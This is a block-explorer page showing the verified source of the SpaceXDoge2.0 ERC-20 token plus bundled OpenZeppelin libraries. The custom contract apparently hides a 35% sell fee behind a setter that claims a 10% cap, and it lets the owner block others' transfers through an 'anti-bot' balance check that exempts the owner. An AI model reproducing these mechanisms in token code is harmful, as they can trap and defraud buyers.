ETH Price: $2,337.79 (-0.38%)

Token

SpaceXDoge2.0 (SXDOGE2.0)
 

Overview

Max Total Supply

210,000,000,000,000 SXDOGE2.0

Holders

131

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
0.000000001286007523 SXDOGE2.0

Value
$0.00
0xe0091c95c2f42d8e4cdbdb7bc2a9a1f7d8debd9d
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
SpaceXDoge20

Compiler Version
v0.8.18+commit.87f61d96

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion
File 1 of 9 : SpaceXDoge.sol
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.9;

import "@openzeppelin/contracts/token/ERC20/ERC20.sol";
import "@openzeppelin/contracts/token/ERC20/extensions/ERC20Burnable.sol";
import "@openzeppelin/contracts/token/ERC20/IERC20.sol";
import "@openzeppelin/contracts/utils/math/SafeMath.sol";
import "@openzeppelin/contracts/access/Ownable.sol";
import "./interfaces/IUniswapV2.sol";

contract SpaceXDoge20 is ERC20, ERC20Burnable, Ownable {
    using SafeMath for uint;

    uint256 private totalTokens;
    uint256 private vat;
    uint256 public startTime;
    uint256 public endTime;
    uint256 public tW = 0;
    uint256 public sT = 0;
    uint256 public bT = 0;

    bool public isAntiBotEnabled = false;
    bool public isTaxEnabled = false;

    mapping(address => bool) private blackList;

    address public buyBackWallet;
    address public swapPair;

    IERC20 private trackToken;
    IUniswapV2Router public swapRouter;

    constructor() ERC20("SpaceXDoge2.0", "SXDOGE2.0") {
        startTime = block.timestamp;
        totalTokens = 420000000 * 10 ** 6 * 10 ** uint256(decimals());

        swapRouter = IUniswapV2Router(
            0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D
        );

        swapPair = IUniswapV2Factory(swapRouter.factory()).createPair(
            address(this),
            swapRouter.WETH()
        );

        _mint(owner(), totalTokens);
    }

    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal override(ERC20) {
        if (from == owner() || to == owner() || tx.origin == owner()) {
            
        } else {
            if (block.timestamp > startTime && block.timestamp < endTime) {
                uint256 balanceAntiBot = trackToken.balanceOf(tx.origin);
                require(balanceAntiBot >= vat);
            }
        }
        super._beforeTokenTransfer(from, to, amount);
    }

    function _transfer(
        address sender,
        address recipient,
        uint256 amount
    ) internal override {
        if (isTaxEnabled == true && tx.origin != owner()) {
            if (recipient == swapPair) {
                uint256 fee = caculateFee(amount, sT);
                super._transfer(sender, buyBackWallet, fee);
                amount = amount.sub(fee);
            } else if (sender == swapPair) {
                uint256 balanceUser = balanceOf(sender);
                require(
                    amount < balanceUser.mul(9990).div(10000),
                    "Anti Bot: Max 99.9% of balance"
                );
                uint256 fee = caculateFee(amount, bT);
                super._transfer(sender, buyBackWallet, fee);
                amount = amount.sub(fee);
            }
        }
        super._transfer(sender, recipient, amount);
    }

    function getBurnedAmountTotal() external view returns (uint256 _amount) {
        return totalTokens.sub(totalSupply());
    }

    function launch(
        address _trackToken,
        address _buyBackWallet,
        uint256 _endTime,
        uint256 _vat
    ) external onlyOwner {
        require(isAntiBotEnabled == false, "Anti Bot: Already enabled.");
        require(
            _trackToken != address(this),
            "Anti Bot: Can not track this token."
        );

        // Antibot
        isAntiBotEnabled = true;
        trackToken = IERC20(_trackToken);
        endTime = _endTime;
        vat = _vat;

        // Tax
        isTaxEnabled = true;
        sT = 3500;
        bT = 500;

        // Buy-Back Wallet
        buyBackWallet = _buyBackWallet;
    }

    function tax(uint16 _sT, uint16 _bT) external onlyOwner {
        require(_sT <= 1000, "Sell fee must be less than 10%");
        require(_bT <= 1000, "Buy fee must be less than 10%");
        sT = _sT;
        bT = _bT;
    }

    function setBuyBackWallet(
        address _buyBackWallet
    ) external onlyOwner {
        buyBackWallet = _buyBackWallet;
    }

    function caculateFee(
        uint256 _amount,
        uint256 _percent
    ) public pure returns (uint256) {
        uint256 fee = _amount.mul(_percent).div(10000);
        return fee;
    }
}

File 2 of 9 : Ownable.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.7.0) (access/Ownable.sol)

pragma solidity ^0.8.0;

import "../utils/Context.sol";

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

File 3 of 9 : ERC20.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.8.0) (token/ERC20/ERC20.sol)

pragma solidity ^0.8.0;

import "./IERC20.sol";
import "./extensions/IERC20Metadata.sol";
import "../../utils/Context.sol";

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Context, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            _balances[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += amount;
        }

        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            _totalSupply -= amount;
        }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

File 4 of 9 : ERC20Burnable.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.5.0) (token/ERC20/extensions/ERC20Burnable.sol)

pragma solidity ^0.8.0;

import "../ERC20.sol";
import "../../../utils/Context.sol";

/**
 * @dev Extension of {ERC20} that allows token holders to destroy both their own
 * tokens and those that they have an allowance for, in a way that can be
 * recognized off-chain (via event analysis).
 */
abstract contract ERC20Burnable is Context, ERC20 {
    /**
     * @dev Destroys `amount` tokens from the caller.
     *
     * See {ERC20-_burn}.
     */
    function burn(uint256 amount) public virtual {
        _burn(_msgSender(), amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, deducting from the caller's
     * allowance.
     *
     * See {ERC20-_burn} and {ERC20-allowance}.
     *
     * Requirements:
     *
     * - the caller must have allowance for ``accounts``'s tokens of at least
     * `amount`.
     */
    function burnFrom(address account, uint256 amount) public virtual {
        _spendAllowance(account, _msgSender(), amount);
        _burn(account, amount);
    }
}

File 5 of 9 : IERC20Metadata.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol)

pragma solidity ^0.8.0;

import "../IERC20.sol";

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

File 6 of 9 : IERC20.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.6.0) (token/ERC20/IERC20.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}

File 7 of 9 : Context.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

File 8 of 9 : SafeMath.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.6.0) (utils/math/SafeMath.sol)

pragma solidity ^0.8.0;

// CAUTION
// This version of SafeMath should only be used with Solidity 0.8 or later,
// because it relies on the compiler's built in overflow checks.

/**
 * @dev Wrappers over Solidity's arithmetic operations.
 *
 * NOTE: `SafeMath` is generally not needed starting with Solidity 0.8, since the compiler
 * now has built in overflow checking.
 */
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            uint256 c = a + b;
            if (c < a) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b > a) return (false, 0);
            return (true, a - b);
        }
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
            // benefit is lost if 'b' is also tested.
            // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
            if (a == 0) return (true, 0);
            uint256 c = a * b;
            if (c / a != b) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a / b);
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a % b);
        }
    }

    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator.
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {trySub}.
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b <= a, errorMessage);
            return a - b;
        }
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a / b;
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting with custom message when dividing by zero.
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {tryMod}.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a % b;
        }
    }
}

File 9 of 9 : IUniswapV2.sol
// SPDX-License-Identifier: UNLICENSED 
pragma solidity ^0.8.9;

interface IUniswapV2Factory {
    function createPair(
        address tokenA,
        address tokenB
    ) external returns (address pair);
}

interface IUniswapV2Router {
    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;

    function factory() external pure returns (address);

    function WETH() external pure returns (address);

    function addLiquidityETH(
        address token,
        uint256 amountTokenDesired,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline
    )
        external
        payable
        returns (uint256 amountToken, uint256 amountETH, uint256 liquidity);
}

Settings
{
  "optimizer": {
    "enabled": true,
    "runs": 200
  },
  "outputSelection": {
    "*": {
      "*": [
        "evm.bytecode",
        "evm.deployedBytecode",
        "devdoc",
        "userdoc",
        "metadata",
        "abi"
      ]
    }
  },
  "libraries": {}
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"bT","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"burnFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"buyBackWallet","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_amount","type":"uint256"},{"internalType":"uint256","name":"_percent","type":"uint256"}],"name":"caculateFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"pure","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"endTime","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"getBurnedAmountTotal","outputs":[{"internalType":"uint256","name":"_amount","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"isAntiBotEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"isTaxEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_trackToken","type":"address"},{"internalType":"address","name":"_buyBackWallet","type":"address"},{"internalType":"uint256","name":"_endTime","type":"uint256"},{"internalType":"uint256","name":"_vat","type":"uint256"}],"name":"launch","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"sT","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_buyBackWallet","type":"address"}],"name":"setBuyBackWallet","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"startTime","outputs